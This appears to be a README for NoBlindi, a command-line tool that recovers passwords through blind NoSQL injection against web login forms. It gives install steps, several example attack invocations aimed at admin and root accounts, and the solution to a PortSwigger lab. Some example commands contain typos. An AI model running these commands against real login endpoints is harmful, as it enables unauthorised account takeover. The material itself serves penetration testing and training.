This tool is designed for testing the security of NoSQL databases in web applications. It focuses on identifying and exploiting blind NoSQL injection vulnerabilities to recover passwords. It's a command-line tool, making it easy to integrate into various testing workflows.
- Blind NoSQL Injection for Password Recovery
- Customizable Parameters for Targeted Attacks
- Simple Command-Line Interface
- Cross-Platform Compatibility and Support
sudo git clone https://github.com/YasserREED/NoBlindi.git
cd NoBlindi/
pip install -r requirements.txt
python3 NoBlindi.py -h
python3 NoBlindi.py -h
python3 NoBlindi.py -u https://example.com/login -uf 'username' -pf password -rn 'admin' -b '{"username":"", "password":""}' -sc 200 -f "Invalid credentials"
python3 NoBlindi.py -u https://example.com/login -uf 'user' -un 'admin' -pf 'pass' -b '{"user":"", "pass":"", "redirect":"/dashboard", "security_question":"", "security_answer":""}' -sc 302 --redirect -sh "Authorization" -f "Login failed"
python3 NoBlindi.py -u https://examplecorp.com/admin -uf 'login' -pf password -un 'superadmin' -b '{"login":"", "password":"start123!", "last_active_timestamp":"", "login_count":"", "account_status":"active"}' -sc 200 -f "Access Denied"
python3 NoBlindi.py -u https://internalsite.example.org/login -uf 'username' -un 'root' -b '{"username":"", "password":"", "otp_code":"", "session_expiry":"1hr", "browser_info":"Mozilla/5.0"}' -sc 200 - "*+.?|{}[]"
python3 NoBlindi.py -u https://api.example.com/v1/authenticate -uf 'email' -un 'johndoe@example.com' -pf 'pwd' -b '{"email":"", "pwd":"", "api_key":"", "request_time":"2023-03-15T12:00:00Z", "client_version":"1.2.3"}' -sc 200 -sh "JWT-Token" -f "Unauthorized
python3 NoBlindi.py -u https://www.attacker.com/login -uf 'username' -pf password --username 'admin' -b '{"username":"", "password":""}'
python3 NoBlindi.py -u https://www.attacker.com/login -uf 'username' -pf password --username 'admin' -b '{"username":"", "password":""}' -success_code 200 -f "Invalid username or password"
1- Access the Lab: https://portswigger.net/web-security/nosql-injection/lab-nosql-injection-bypass-authentication
2- Use this command to solve the protswigger lab and retrieve the admin password:
python3 NoBlindi.py -u https://0a7a0055033f04f080539ef200bc00b5.web-security-academy.net/login -uf 'username' -pf password -rn 'admin' -b '{"username":"", "password":""}' -sc 302 -rn 'admin' -r
Enjoy! ❤️🔥